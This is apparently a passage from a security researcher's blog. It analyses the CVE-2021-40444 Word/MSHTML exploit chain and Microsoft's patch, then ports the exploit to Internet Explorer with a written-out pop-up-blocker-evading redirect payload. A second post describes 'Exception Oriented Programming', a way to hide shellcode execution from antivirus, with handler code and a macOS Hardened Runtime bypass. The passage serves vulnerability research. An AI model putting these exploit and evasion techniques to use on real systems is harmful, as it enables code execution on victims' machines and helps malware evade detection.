  3. Then, an interesting "!x-usc" suffix appended to the malicious URL.
  4. Finally, the same malicious URL repeated.

Let's investigate each piece one-by-one.

Reproduction: What's "MHTML"?

A useful tool I've discovered in past research is URLProtocolView from Nirsoft. At a high level, URLProtocolView allows you to list and enumerate the URL protocols installed on your machine.

[Image: The MHTML Protocol in URLProtocolView]

The MHTML protocol used in the Target attribute was a Pluggable Protocol Handler, similar to HTTP. The inetcomm.dll module was responsible for handling requests to this protocol.

[Image: The HTTP* Protocols in URLProtocolView]

Unlike MHTML however, the HTTP protocol is handled by the urlmon.dll module.

When I was researching past exploits involving the MHTML protocol, I came across an interesting article all the way back from 2011 about CVE-2011-0096. In this case, a Google engineer publicly disclosed an exploit that they suspected malicious actors attributed to China had already discovered. Similar to this vulnerability, CVE-2011-0096 was only found to be used in "very targeted" attacks.

When I was researching implementations of exploits for CVE-2011-0096, I came across an exploit-db release that included an approach for abusing the vulnerability through a Word document. Specifically, in parts #5 and #6 of the exploit, the author discovered that CVE-2011-0096 could be abused to launch executables on the local machine and read the contents of the local filesystem. The interesting part here is that this 2011 vulnerability also involved abusing the MHTML URL protocol and also allowed for remote code execution via a Word document, just like CVE-2021-40444.

Reproduction: What about the "X-USC" in the Target?

Going back to our strange Target attribute, what is the "!x-usc:" portion for?

I found a blog post from 2018 by @insertScript which discovered that the x-usc directive was used to reference an external link. In fact, the example URL given by the author still works on the latest version of Internet Explorer (IE). If you enter "mhtml:http://google.com/whatever!x-usc:http://bing.com" into your IE URL bar while monitoring network requests, there will be requests to both Google and Bing, due to the "x-usc" directive.

In the context of CVE-2021-40444, I was unable to discover a definitive answer for why the same URL was repeated after an "x-usc" directive. As we'll see in upcoming sections, the JavaScript in side.html is executed regardless of whether or not the attribute contains the "x-usc" suffix. It is possible that due to some potential race conditions, this suffix was added to execute the exploit twice to ensure successful payload delivery.

Reproduction: Attempting to Create my Own Payload

Now that we know how the remote side.html page is triggered by the Word document, it was time to try and create our own. Although we could proceed by hosting the same side.html payload the attackers used in their exploit, it is important to produce a minimal reproduction example first.

Instead of hosting the second-stage side.html payload, I opted to write a barebone HTML page that would indicate JavaScript execution was successful. This way, we can understand how JavaScript is executed by the Word document before reverse engineering what the attacker's JavaScript does.

[Image: Test Payload to Prove JS Execution]

In the example above, I created an HTML page that simply made an XMLHttpRequest to a non-existent domain. If the JavaScript is executed, we should be able to see a request to "icanseethisrequestonthenetwork.com" inside of Fiddler.

Before testing in the actual Word document, I verified as a sanity check that this page does make the web request inside of Internet Explorer. Although the code may seem simple enough that it would "obviously work", performing simple sanity checks like these on your fundamental assumptions can save you significant time debugging later. If you don't verify a fundamental assumption and continue with reverse engineering, you could spend hours debugging the wrong issue when in fact you made a basic mistake.

[Image: Modified Relationship with Barebone Payload]
[Image: Network Requests After Executing Modified Document]

Once I patched the original Word document with my modified relationship XML, I launched it inside my VM with the Fiddler proxy running. I was seeing requests to the send_request.html payload! But... there were no requests to "icanseethisrequestonthenetwork.com". This demonstrated a flaw in our fundamental assumption that whatever HTML page we point the MHTML protocol towards will be executed.

How do you debug an issue like this? One approach would be to go in blind and try to reverse engineer the internals of the HTML engine to see why JavaScript wasn't being executed. The reason this is not a great idea is because often these codebases can be massive, and it would be like finding a needle in a haystack.

What can we do instead? Create a minimally viable reproduction case where the JavaScript of the HTML is executed. We know that the attacker's payload must have worked in their attack. What if instead of writing our own payload first, we tried to host their payload instead?

[Image: Network Requests After Executing with Side.html Payload]

I uploaded the attacker's original "side.html" payload to my server and replaced the relationship in the Word document with that URL. When I executed this modified document in my VM, I saw something extremely promising: requests for "ministry.cab". This means that the attacker's JavaScript inside side.html was executed!

We have an MVP payload that gets executed by the Word document; now what? Although we could ignore our earlier problem with our own payload and try to figure out what the CAB file is used for directly, we'd be skipping a crucial step of the exploit. We want to understand CVE-2021-40444, not just reproduce it.

With this MVP, we can now try to debug and reverse engineer the question, "Why does the working payload result in JavaScript execution, but not our own sample?".

Reproduction: Reverse Engineering Microsoft’s HTML Engine

The primary module responsible for processing HTML in Windows is MSHTML.DLL, the "Microsoft HTML Viewer". This binary alone is 22 MB, because it contains almost everything from rendering HTML to executing JavaScript. For example, Microsoft has their own JavaScript engine in this binary used in Internet Explorer (and Word).

Given this massive size, blindly reversing is a terrible approach. What I like to do instead is use ProcMon to trace the execution of the successful (document with side.html) and failing payload (document with barebone HTML), then compare their results. I executed the attacker payload document and my own sample document while monitoring Microsoft Word with ProcMon.

[Image: Microsoft Word Loading JScript9.dll in Success Case]

With the number of operations an application like Microsoft Office makes, it can be difficult to sift through the noise. The best approach I have for this problem is to use context to find relevant operations. In this case, since we were looking into the execution of JavaScript, I looked for operations involving the word "script".

You might ask: what can we do with these relevant operations? An insanely useful feature of ProcMon is the ability to see the caller stack for a given operation. This lets you see exactly what code executed the operation.

[Image: Stack Trace of JScript9.dll Module Load]
[Image: IDA Pro Breakpoint on PostManExecute]

It looked like the PostManExecute function was primarily responsible for triggering the complete execution of our payload. Using IDA Pro, I set a breakpoint on this function and opened both the successful and failing payloads.

I found that when the success payload was launched, PostManExecute would be called and the page would be loaded. In the failure case, however, PostManExecute was not called and thus the page was never executed. Now we needed to figure out why PostManExecute was being invoked for the attacker's payload but not ours.

[Image: Partial Stack Trace of JScript9.dll Module Load]

Going back to the call stack, what’s interesting is that PostManExecute seems to be the result of a callback that is being invoked in an asynchronous thread.

[Image: X-Refs to CDwnChan::OnMethodCall from Call Stack]

Looking at the cross references for the function called right after the asynchronous dispatcher, CDwnChan::OnMethodCall, I found that it seemed to be queued in another function called CDwnChan::Signal.

[Image: Asynchronous Execution of CDwnChan::OnMethodCall inside CDwnChan::Signal]
[Image: X-Refs to CDwnChan::Signal]

CDwnChan::Signal seemed to be using the function "_GWPostMethodCallEx" to queue the CDwnChan::OnMethodCall to be executed in the asynchronous thread we saw. Unfortunately, this Signal function is called from many places, and it would be a waste of time to try to statically reverse engineer every reference.

[Image: X-Refs to Asynchronous Queue'ing Function __GWPostMethodCallEx]

What can we do instead? Looking at the X-Refs for _GWPostMethodCallEx, it seemed like it was used to queue almost everything related to HTML processing. What if we hooked this function and compared the different methods that were queued between the success and failure paths?

[Image: Methods queued via __GWPostMethodCallEx during execution of the successful and failing payloads]

Whenever __GWPostMethodCallEx was called, I recorded the method being queued for asynchronous execution and the call stack. The diagram above demonstrates the methods that were queued during the execution of the successful payload and the failing payload. Strangely, in the failure path, the processing of the HTML page was terminated (CDwnBindData::TerminateOnApt) before the page was ever executed.

[Image: Callstack for CDwnBindData::TerminateOnApt]

Why was the Terminate function being queued before the OnMethodCall function in the failure path? The call stacks for the Terminate function matched between the success and failure paths. Let’s reverse engineer those functions.

[Image: Partial Pseudocode of CDwnBindData::Read]

When I debugged the CDwnBindData::Read function, which called the Terminate function, I found that a call to CDwnStm::Read was working in the success path but returning an error in the failure path. This is what terminated the page execution for our sample payload!

The third argument to CDwnStm::Read was supposed to be the number of bytes the client should try to read from the server. For some reason, the client was expecting 4096 bytes and my barebone HTML file was not that big.

As a sanity check, I added a bunch of useless padding to the end of my HTML file to make its size 4096+ bytes. Let’s see our network requests with this modified payload.

[Image: Modified Barebone HTML with Padding to 4096 bytes]
[Image: Network Requests of Barebone Word Document]

We had now found and fixed the issue with our barebone HTML page! But our work isn't over yet. We wouldn’t be great reverse engineers if we didn’t investigate why the client was expecting 4096 bytes in the first place.

[Image: Partial Pseudocode of CHtmPre::GetReadRequestSize]

I traced back the origin of the expected size to a call in CHtmPre::Read to CHtmPre::GetReadRequestSize. Stepping through this function in a debugger, I found that a field at offset 136 of the CHtmPre class represented the request size the client should expect. How can we find out why this value is 4096? Something had to write to it at some point.

[Image: Partial Pseudocode of CHtmPre Constructor]

Since we were looking at a class function of the CHtmPre class, I set a breakpoint on the constructor for this class. When the debugger reached the constructor, I placed a write memory breakpoint for the field offset we saw (+ 136).

[Image: Partial Pseudocode of CEncodeReader Constructor when the Write Breakpoint Hit]

The breakpoint hit! And not so far away either. The 4096 value was being set inside of another object constructor, CEncodeReader::CEncodeReader. This constructor was instantiated by the CHtmPre constructor we just hooked. Where did the 4096 come from then? It was hardcoded into the CHtmPre constructor!

[Image: Partial Pseudocode of CHtmPre Constructor, Highlighting Hardcoded 4096 Value]

What was happening was that when the CHtmPre instance was constructed, it had a default read size of 4096 bytes. The client was reading the bytes from the HTTP response before this field was updated with the real response size. Since our barebone payload was just a small HTML page under 4096 bytes, the client thought that the server hadn’t sent the required response and thus terminated the execution.

The reason the attacker's payload worked is because it was above 4096 bytes in size. We just found a bug still present in Microsoft’s HTML processor!

Reproduction: Fixing the Attacker's Payload

[Image: Network Requests After Executing with Side.html Payload]

We figured out how to make sure our payload executes. If you recall from an earlier section of this blog post, we saw that a request to a "ministry.cab" file was being made by the attacker's side.html payload. Fortunately for us, the attacker's sample came with the CAB file the server was originally serving.

This CAB file was interesting. It had a single file named "../msword.inf", suggesting a relative path escape attack. This INF file was a PE binary for the attacker’s Cobalt Strike beacon. I replaced this file with a simple DLL that opened Calculator for testing. Unfortunately, when I uploaded this CAB file to my server, I saw a successful request to it but no Calculator.

[Image: Operations involving msword.inf from CAB file]
[Image: Call stack of msword.inf Operation]

I monitored Word with ProcMon once again to try to see what was happening with the CAB file. I filtered for "msword.inf" and found interesting operations where Word was writing it to the VM user's %TEMP% directory. The "VerifyTrust" function name in the call stack suggested that the INF file was written to the TEMP directory while Word was trying to verify its signature.

Let's step through these functions to figure out what's going on.

[Image: Partial Pseudocode of Cwvt::VerifyTrust]

After stepping through Cwvt::VerifyTrust with a debugger, I found that the function attempted to verify the signature of files contained within the CAB file. Specifically, if the CAB file included an INF file, it would extract it to disk and try to verify its digital signature.

What was happening was that the extraction process didn't have any security measures, allowing an attacker to use relative path escapes to get out of the temporary directory that was generated for the CAB file.

The attackers were using a zero-day with ActiveX controls:

  1. The attacker’s JavaScript (side.html) would attempt to execute the CAB file as an ActiveX control.
  2. This triggered Microsoft’s security controls to verify that the CAB file was signed and safe to execute.
  3. Unfortunately, Microsoft handled this CAB file without care: although the signature verification failed, the extraction process still allowed an attacker to plant the INF file in another location with relative path escapes.

If there were a user-writable directory where simply planting a malicious INF file caused it to execute, the attackers could have stopped here with their exploit. No such directory exists, though, so they needed some other way to execute the INF file as a PE binary.

[Image: Strange control.exe Execution with INF File in Command Line]
[Image: Strange rundll32.exe Execution with INF File in Command Line]

Going back to ProcMon, I tried to see why the INF file wasn't being executed. It looked like they were using another exploit to trigger the execution of "control.exe".

[Image: ".cpl" Used as a URL Protocol]

The attackers were triggering the execution of a Control Panel Item. The command line for control.exe suggested that they were using the ".cpl" file extension as a URL protocol combined with relative path escapes to trigger the INF file, with a URL along the lines of ".cpl:../../../AppData/Local/Temp/msword.inf" (the exact number of escapes depends on the document's location).

Why wasn’t my Calculator DLL being executed then? Entirely my mistake! I was executing the Word document from a nested directory, but the attackers were only spraying a few relative path escapes that never reached my user directory. This makes sense because this document is intended to be executed from a victim's Downloads folder, whereas I was hosting the file inside of a nested Documents directory.

I placed the Word document in my Downloads folder and… voila:

[Image: Calculator being Executed by Word Document]

Reversing the Attacker's Payload

We have a working exploit! The next step to understanding the attack is to reverse engineer the attacker's malicious JavaScript. If you recall, it was somewhat obfuscated. Speaking as someone with experience with JavaScript obfuscators, though, it didn't look like the attackers did too much.

[Image: Common JavaScript String Obfuscation Technique seen in Attacker's Code]

A common pattern I see with attempts at string obfuscation in JavaScript is an array containing a bunch of strings and the rest of the code referencing strings through an unknown function which referenced that array.

In this case, we can see a string array named "a0_0x127f" which is referenced inside of the global function "a0_0x15ec". Looking at the rest of the JavaScript, we can see that several parts of it call this unknown function with a numerical index, suggesting that this function is used to retrieve a deobfuscated version of the string.

[Image: String Deobfuscation Script]

This approach to string obfuscation is relatively easy to get past. I wrote a small script to find all calls to the string-lookup function, resolve what each string was, and replace the entire call with the real string. Instead of worrying about the mechanics of the deobfuscation function, we can just call into it like the real code does to retrieve the deobfuscated string.

[Image: Before String Deobfuscation]
[Image: After String Deobfuscation]

This worked extremely well, and we now have a relatively deobfuscated version of their script. The rest of the deobfuscation was just combining strings, getting rid of "indirect" calls to objects, and naming variables given their context. I can't cover each step in detail because there were a lot of minor steps for this last part, but there was nothing especially notable. I tried naming the variables as best I could given the context around them and added comments describing what I thought was happening.

Let’s review what the script does.

[Image: Part #1 of Deobfuscated JavaScript: Create and Destroy an IFrame]

In this first part, the attackers created an iframe element, retrieved the ActiveX scripting interface for that iframe, and destroyed the iframe. Although the iframe has been destroyed, the ActiveX interface is still live and can be used to execute arbitrary HTML/JavaScript.

[Image: Part #2 of Deobfuscated JavaScript: Create Nested ActiveX HTML Documents]

In this next part, the attackers used the destroyed iframe's ActiveX interface to create three nested HTML documents. I am not entirely sure what purpose these nested documents serve, because the exploit works fine if the attackers only use the original ActiveX interface without any nesting.

[Image: Part #3 of Deobfuscated JavaScript: Create ActiveX Control and Trigger INF File]

This final section is what performs the primary exploits.

The attackers make a request to the exploit CAB file ("ministry.cab") with an XMLHttpRequest. Next, the attackers create a new ActiveX Control object inside of the third nested HTML document created in the last step. The class ID and version of this ActiveX control are arbitrary and can be changed, but the important piece is that the ActiveX Control points at the previously requested CAB file. URLMON will automatically verify the signature of the ActiveX Control CAB file, which is when the malicious INF file is extracted into the user's temporary directory.

To trigger their malicious INF payload, the attackers use the ".cpl" file extension as a URL Protocol with a relative path escape in a new HTML document. This causes control.exe to start rundll32.exe, passing the INF file as the Control Panel Item to execute.

The fully deobfuscated and commented HTML/JS payload can be found here.

Overview of the Attack

We covered a significant amount in the previous sections, let's summarize the attack from start to finish:

  1. A victim opens the malicious Word document.
  2. Word loads the attacker's HTML page as an OLE object and executes the contained JavaScript.
  3. An IFrame is created and destroyed, but a reference to its ActiveX scripting surface remains.
  4. The CAB file is invoked by creating an ActiveX control for it.
  5. While the CAB file's signature is verified, the contained INF file is written to the user's Temp directory.
  6. Finally, the INF is invoked by using the ".cpl" extension as a URL protocol, using relative path escapes to reach the temporary directory.

Reversing Microsoft's Patch

When Microsoft released its advisory for this bug on September 7th, they had no patch! To save face, they claimed Windows Defender was a mitigation, but that was just a detection for the attacker's exploit. The underlying vulnerability was untouched.

It took them nearly a month from when the first known sample was uploaded to VirusTotal (August 19th) to finally fix the issue on September 14th with a Patch Tuesday update. Let’s take a look at the major changes in this patch.

A popular practice among security researchers is to diff a binary that used to contain a vulnerability against its patched equivalent. I updated my system but saved several DLL files from my unpatched machine. There are a couple of tools that are great for finding assembly-level differences between two similar binaries.

  1. BinDiff by Zynamics
  2. Diaphora by Joxean Koret

I went with Diaphora because it is more advanced than BinDiff and allows for easy pseudo-code level comparisons. The primary binaries I diff'd were:

  1. IEFRAME.dll - This is what executed the URL protocol for ".cpl".
  2. URLMON.dll - This is what had the CAB file extraction exploit.

Reversing Microsoft's Patch: IEFRAME

Once I diff’d the updated and unpatched binaries, I found ~1000 total differences, but only ~30 major changes. One function that had heavy changes and was associated with the CPL exploit was _AttemptShellExecuteForHlinkNavigate.

Pseudocode Diff of _AttemptShellExecuteForHlinkNavigate

In the old version of IEFRAME, this function simply used ShellExecuteW to open the URL protocol with no verification. This is why the CPL file extension was processed as a URL protocol.

In the new version, they added a significant number of checks for the URL protocol. Let’s compare the differences.

Patched _AttemptShellExecuteForHlinkNavigate Pseudocode

New IsValidSchemeName Function

In the patched version of _AttemptShellExecuteForHlinkNavigate, the primary addition that prevents the use of file extensions as URL Protocols is the call to IsValidSchemeName.

This function takes the URL Protocol that is being used (i.e. ".cpl") and verifies that all characters in it are alphanumeric. For example, this exploit used the CPL file extension to trigger the INF file. With this patch, ".cpl" would fail the IsValidSchemeName function because it contains a period, which is non-alphanumeric.
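
Based on that description, the added check plausibly looks like the following (a reconstruction for illustration only; the exact IEFRAME implementation may differ):

#include <windows.h>
#include <wctype.h>

// Sketch: reject any URL scheme containing a non-alphanumeric character.
// ".cpl" fails because of the leading period.
BOOL IsValidSchemeName(LPCWSTR scheme)
{
    for (; *scheme != L'\0'; scheme++) {
        if (!iswalnum(*scheme))
            return FALSE;
    }
    return TRUE;
}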

An important factor to note is that this patch for using file extensions as URL Protocols only applies to MSHTML. File extensions are still exposed for use in other attacks against ShellExecute, which is why I wouldn't be surprised if we saw similar techniques in future vulnerabilities.

Reversing Microsoft's Patch: URLMON

I performed the same patch diffing on URLMON and found a major change in catDirAndFile. This function was used during extraction to generate the output path for the INF file.

Patched catDirAndFile Pseudocode

The patch for the CAB extraction exploit was extremely simple. All Microsoft did was replace any instance of a forward slash with a backslash. This prevents the INF extraction exploit of the CAB file because backslashes are ignored for relative path escapes.
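
In C, the added normalization amounts to something like this (a sketch of the behavior described above, not the literal patched code):

// Replace every forward slash with a backslash before concatenating the
// attacker-controlled file name; backslash escapes are ignored during
// extraction, so "../" can no longer walk out of the target directory.
void NormalizeSlashes(WCHAR *fileName)
{
    for (; *fileName != L'\0'; fileName++) {
        if (*fileName == L'/')
            *fileName = L'\\';
    }
}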

Abusing CVE-2021-40444 in Internet Explorer

Although Microsoft's advisory covers an attack scenario where this vulnerability is abused in Microsoft Office, could we exploit this bug in another context?

Since Microsoft Office uses the same engine Internet Explorer uses to display web pages, could CVE-2021-40444 be abused to gain remote code execution from a malicious page opened in IE? When I tried to visit the same payload used in the Word document, the exploit did not work "out of the box", specifically due to an error with the pop-up blocker.

IE blocks .cpl popup

Although the CAB extraction exploit was successfully triggered, the attempt to launch the payload failed because Internet Explorer considered the ".cpl" exploit to be creating a pop-up.

Fortunately, we can port the .cpl exploit to get around this pop-up blocker relatively easily. Instead of creating a new page, we can simply redirect the current page to the ".cpl" URL.

function redirect() {
    //
    // Redirect current window without creating new one,
    // evading the IE pop up blocker.
    //
    window.location = ".cpl:../../../AppData/Local/Temp/Low/msword.inf";
    document.getElementById("status").innerHTML = "Done";
}

//
// Trigger in 500ms to give time for the .cab file to extract.
//
setTimeout(function() {
    redirect()
}, 500);

With the small addition of the redirect, CVE-2021-40444 works without issue in Internet Explorer. The complete code for this ported HTML/JS payload can be found here.

Conclusion

CVE-2021-40444 is in fact composed of several vulnerabilities, as we investigated in this blog post. Not only was there the initial step of extracting a malicious file to a predictable location through the CAB file exploit, but there was also the fact that URL Protocols could be file extensions.

In the latest patch, Word still executes pages with JavaScript if you use the MHTML protocol. What’s frightening to me is that the entire attack surface of Internet Explorer is exposed to attackers through Microsoft Word. That is a lot of legacy code. Time will tell what other vulnerabilities attackers will abuse in Internet Explorer through Microsoft Office.

Abusing Exceptions for Code Execution, Part 1

14 February 2022 at 20:11
Abusing Exceptions for Code Execution, Part 1

A common offensive technique used by operators and malware developers alike has been to execute malicious code at runtime to avoid static detection. Often, methods of achieving runtime execution have focused on placing arbitrary code into executable memory that can then be executed.

In this article, we will explore a new approach to executing runtime code that does not rely on finding executable regions of memory, but instead relies on abusing existing trusted memory to execute arbitrary code.

Background

Some common methods of runtime execution include:

  1. Allocating executable memory at runtime.
  2. Abusing Windows Section objects.
  3. Abusing existing RWX (read/write/execute) regions of memory allocated by legitimate code.
  4. Loading legitimate binaries that include an RWX PE section that can be overwritten.

One common pattern in all these methods is that they have always had a heavy focus on placing arbitrary shellcode in executable regions of memory. Another technique that has not seen significant adoption in the malware community due to its technical complexity is Return-Oriented Programming (ROP).

As a brief summary, ROP is a common technique seen in memory corruption exploits where an attacker searches for “snippets of code” (gadgets) inside binaries that perform a desired instruction and soon after return to the caller. These “gadgets” can then be used in a chain to perform small operations that add up to a larger goal.

Although typically used for memory corruption exploits, there has been limited use in environments where attackers already have code execution. For example, in the Video Game Hacking industry, there have been open-source projects that allow cheaters to abuse ROP gadgets to execute simplified shellcode for the purposes of gaining an unfair advantage in a video game.

The greatest limitation with ROP for runtime execution however is that the instruction set of potential gadgets can be extremely limited and thus is challenging to port complex shellcode to.

As an attacker that already has execution in an environment, ROP is an inefficient method of performing arbitrary operations at runtime. For example, assume you are given the following assembly located in a legitimate binary:

imul eax, edx
add eax, edx
ret

Using ROP, an attacker could only abuse the add eax, edx instruction because any previous instructions are not followed by a return instruction.

On a broader scale, although legitimate binaries are filled with a variety of different instructions performing all-kinds of operations, the limitations of ROP prevent an attacker from using most of these legitimate instructions.

Continuing the example assembly provided, the reason an attacker could not abuse the initial imul eax, edx instruction without corrupting their output is because as soon as the imul instruction is executed, the execution flow of the program would simply continue to the next add eax, edx instruction.

Theory: Runtime Obfuscation

I propose a new method of abusing legitimate instructions already present in trusted code, Exception Oriented Programming. Exception Oriented Programming is the theory of chaining together instructions present in legitimate code and “stepping over” these instructions one-by-one using a single step exception to simulate the execution of arbitrary shellcode.

As a general method, the steps to performing Exception Oriented Programming given arbitrary shellcode are:

  1. Setup the environment such that the program can intercept single step exceptions.
  2. Split each assembly instruction in the arbitrary shellcode into their respective assembled bytes.
  3. For each instruction, find an instance of the assembled bytes present in any legitimate module and store the memory location of these legitimate instructions.
  4. Execute any code that will cause an exception that the exception handler created in Step 1 can intercept. This can be as simple as performing a call instruction on an int3 (0xCC) instruction.
  5. In the exception handler, set the single step flag and set the instruction pointer register to the location of the next legitimate instruction for that shellcode.
  6. Repeat Step 5 until all instructions of the shellcode are executed.

The largest benefit to this method is that Exception Oriented Programming has significantly less requirements than Return Oriented Programming for an attacker that already has execution capabilities.

Next, we will cover some practical implementations of this theory. Although the implementations you will see are operating system specific, the theory itself is not restricted to one operating system. Additionally, implementation suggestions will stick strictly to documented methods, however it may be possible to implement the theory via undocumented methods such as directly hooking ntdll!KiUserExceptionDispatcher.

Vectored Exception Handlers

In this section, we will explore how to use Vectored Exception Handlers (VEH) to implement the EOP theory. Vectored Exception Handlers are an extension to Structured Exception Handling on Windows and are not frame-based. VEH will be called for unhandled exceptions regardless of the exception's location.

The flow for the preparation stage of this implementation is as follows:

  1. The application will register a VEH via the AddVectoredExceptionHandler Windows API.
  2. The application will split each instruction of the given shellcode using any disassembler. For the example proof-of-concept, we will use the Zydis disassembler library.
  3. For each split instruction, the application will attempt to find an instance of that instruction present in the executable memory of any loaded modules. These memory locations will be stored for later use by the exception handler.
  4. The application will finish preparing by finding any instance of an int3 instruction (a single 0xCC byte). This instruction will be stored for use by the exception handler and is returned to the caller which will invoke the arbitrary shellcode.

Once the necessary memory locations have been found, the caller can invoke the arbitrary shellcode by executing the int3 instruction that was returned to them.

  1. Once the caller has invoked the int3 instruction, the exception handler will be called with the code STATUS_BREAKPOINT. The exception handler should determine if this exception is for executing arbitrary shellcode by comparing the exception address with the previously stored location of the int3 instruction.
  2. If the breakpoint is indeed for the arbitrary shellcode, then the exception handler should:
    1. Retrieve the list of legitimate instructions needed to simulate the arbitrary shellcode.
    2. Store these instructions in thread-local storage.
    3. Set the instruction pointer to the first legitimate instruction to execute.
    4. Set the Trap flag on the FLAGS register.
    5. Continue execution.
  3. The rest of the instructions will cause a STATUS_SINGLE_STEP exception. In these cases, the exception handler should:
    1. Retrieve the list of legitimate instructions to execute from the thread-local storage.
    2. Set the instruction pointer to the next legitimate instruction's memory location.
    3. If this instruction is not the last instruction to execute, set the Trap flag on the FLAGS register. Otherwise, do not set the Trap flag.
    4. Continue execution.

Assuming the shellcode ends with a return instruction, eventually the execution flow will be gracefully returned to the caller. A source code sample of Exception Oriented Programming through Vectored Exception Handlers is provided in a later section.
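
Before moving on, here is a minimal sketch of such a handler (g_Instructions, g_InstructionCount, and g_Index are hypothetical globals filled during preparation; the int3-address check and thread-local storage are omitted for brevity):

#include <windows.h>

extern ULONG_PTR g_Instructions[];   // legitimate instruction addresses
extern SIZE_T    g_InstructionCount;
extern SIZE_T    g_Index;

LONG NTAPI EopVectoredHandler(PEXCEPTION_POINTERS Info)
{
    DWORD code = Info->ExceptionRecord->ExceptionCode;
    if (code != EXCEPTION_BREAKPOINT && code != EXCEPTION_SINGLE_STEP)
        return EXCEPTION_CONTINUE_SEARCH;

    // Redirect execution to the next legitimate instruction.
    Info->ContextRecord->Rip = g_Instructions[g_Index++];

    // Keep single-stepping until the last instruction has been dispatched.
    if (g_Index < g_InstructionCount)
        Info->ContextRecord->EFlags |= 0x100; // set the Trap Flag

    return EXCEPTION_CONTINUE_EXECUTION;
}

// Registered during preparation with:
// AddVectoredExceptionHandler(1, EopVectoredHandler);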

Structured Exception Handlers

Although Vectored Exception Handlers are great, they're not exactly stealthy. For example, an anti-virus could use user-mode hooks to detect when vectored exception handlers are registered. Obviously there are plenty of ways to bypass such mitigations, but if there are stealthier alternatives, why not give them a try?

One potential path I wanted to investigate for Exception Oriented Programming was using generic Structured Exception Handling (SEH). Given that VEH itself is an extension to SEH, why wouldn't frame-based SEH work too? Before we can dive into implementing Exception Oriented Programming with SEH, it's important to understand how SEH works.

void my_bad_code() {
    __try {
        __debugbreak(); // raise STATUS_BREAKPOINT (int3)
    } __except(EXCEPTION_EXECUTE_HANDLER) {
        printf("Exception handler called!");
    }
}

Let's say you surround some code with a try/except SEH block. When an exception occurs in that code, how does the application know what exception handler to invoke?

Exception Directory of ntdll.dll

Nowadays SEH exception handling information is compiled into the binary, specifically the exception directory, detailing what regions of code are protected by an exception handler. When an exception occurs, this table is enumerated during an "unwinding process", which checks if the code that caused the exception or any of the callers on the stack have an SEH exception handler.

An important principle of Exception Oriented Programming is that your exception handler must be able to catch exceptions in the legitimate code that is being abused. The problem with SEH? If a function is already protected by an SEH exception handler, then when an exception occurs, the exception may never reach the exception handler of the caller.

This presents a challenge for Exception Oriented Programming, how do you determine whether a given function is protected by an incompatible exception handler?

Fortunately, the mere presence of an exception handler does not mean a region of code cannot be used. Unless the function for some reason would create a single step exception during normal operation or the function has a "catch all" handler, we can still use code from many functions protected by an exception handler.

To determine if a region of memory is compatible with Exception Oriented Programming:

  1. Determine if the region of memory is registered as protected in the module's exception directory. This can be achieved by directly parsing the module or by using the function RtlLookupFunctionEntry, which searches for the exception directory entry for a given address.
  2. If the region of memory is not protected by an exception handler (aka RtlLookupFunctionEntry returns NULL), then you can use this region of memory with no problem.
  3. If the region of memory is protected by an exception handler, you must verify that the exception handler will not corrupt the stack. During the unwinding process, functions with an exception handler can define "unwind operations" to help clean up the stack from changes in the function's prolog. This can in turn corrupt the call stack when an exception is being handled.
    1. To avoid this problem, check if the unwind operations contains either the UWOP_ALLOC_LARGE operation or the UWOP_ALLOC_SMALL operation. These were found to cause direct corruption to the call stack during testing.
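
A minimal sketch of this check (ContainsStackAllocUnwindOps is a hypothetical helper that parses the entry's UNWIND_INFO for the two operations named above):

#include <windows.h>

BOOL ContainsStackAllocUnwindOps(ULONG64 ImageBase, PRUNTIME_FUNCTION Entry);

BOOL IsEopCompatible(ULONG64 InstructionAddr)
{
    ULONG64 imageBase = 0;
    PRUNTIME_FUNCTION entry = RtlLookupFunctionEntry(InstructionAddr, &imageBase, NULL);

    if (entry == NULL)
        return TRUE; // not protected by any exception handler

    // Protected regions remain usable unless unwinding would corrupt the stack.
    return !ContainsStackAllocUnwindOps(imageBase, entry);
}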

Once compatible instruction locations are found within legitimate modules, how do you actually perform the Exception Oriented Programming attack with SEH? It's surprisingly simple.

With SEH exception handling using a try except block, you can define both an exception filter and the handler itself. When an exception occurs in the protected try except block, the exception filter you define determines whether or not the exception should be passed to the handler itself. The filter is defined as a parameter to the __except block:

void my_bad_code() {
    __try {
        __debugbreak(); // raise STATUS_BREAKPOINT (int3)
    } __except(MyExceptionFilter()) {
        printf("Exception handler called!");
    }
}

In the example above, the exception filter is the function MyExceptionFilter and the handler is the code that simply prints that it was called. When registering a vectored exception handler, the handler function must be of the prototype typedef LONG(NTAPI* ExceptionHandler_t)(PEXCEPTION_POINTERS ExceptionInfo).

It turns out that the prototype for exception filters is actually compatible with the prototype above. What does this mean? We can reuse the same exception handler we wrote for the VEH implementation of Exception Oriented Programming by using it as an exception filter.

void my_bad_code() {
    __try {
        __debugbreak(); // raise STATUS_BREAKPOINT (int3)
    } __except(VectoredExceptionHandler(GetExceptionInformation())) {
        printf("Exception handler called!");
    }
}

In the code above, the vectored exception handler is invoked using the GetExceptionInformation macro, which provides the function the exception information structure it can both read and modify.

That's all that you need to do to get Exception Oriented Programming working with standard SEH! Besides ensuring that the instruction locations found are compatible, the vectored exception handler is directly compatible when used as an exception filter.

Why is standard SEH significantly better than using VEH for Exception Oriented Programming? SEH is built into the binary itself and is used legitimately everywhere. Unlike vectored exception handling, there is no global function to register your handler.

From the perspective of static detection, there are practically no indicators that a given SEH handler is used for Exception Oriented Programming. Although dynamic detection may be possible, it is significantly harder to implement compared to if you were using Vectored Exception Handlers.

Bypassing the macOS Hardened Runtime

Up to this point, the examples around abuse of the method have been largely around the Windows operating system. In this section, we will discuss how we can abuse Exception Oriented Programming to bypass security mitigations on macOS, specifically parts of the Hardened Runtime.

The macOS Hardened Runtime is intended to provide "runtime integrity of your software by preventing certain classes of exploits, like code injection, dynamically linked library (DLL) hijacking, and process memory space tampering".

One security mitigation imposed by the Hardened Runtime is the restriction of just-in-time (JIT) compilation. For app developers, these restrictions can be bypassed by adding entitlements to disable certain protections.

The com.apple.security.cs.allow-jit entitlement allows an application to allocate writable/executable (WX) pages by using the MAP_JIT flag. A second alternative, the com.apple.security.cs.allow-unsigned-executable-memory entitlement, allows the application to allocate WX pages without the need of the MAP_JIT flag. With Exception Oriented Programming however, an attacker can execute just-in-time shellcode without needing any entitlements.

The flow for the preparation stage of this implementation is as follows:

  1. The application will register a SIGTRAP signal handler using sigaction and the SA_SIGINFO flag.
  2. The application will split each instruction of the given shellcode using any disassembler. For the example proof-of-concept, we will use the Zydis disassembler library.
  3. For each split instruction, the application will attempt to find an instance of that instruction present in the executable memory of any loaded modules. Executable memory regions can be recursively enumerated using the mach_vm_region_recurse function. These memory locations will be stored for later use by the signal handler.
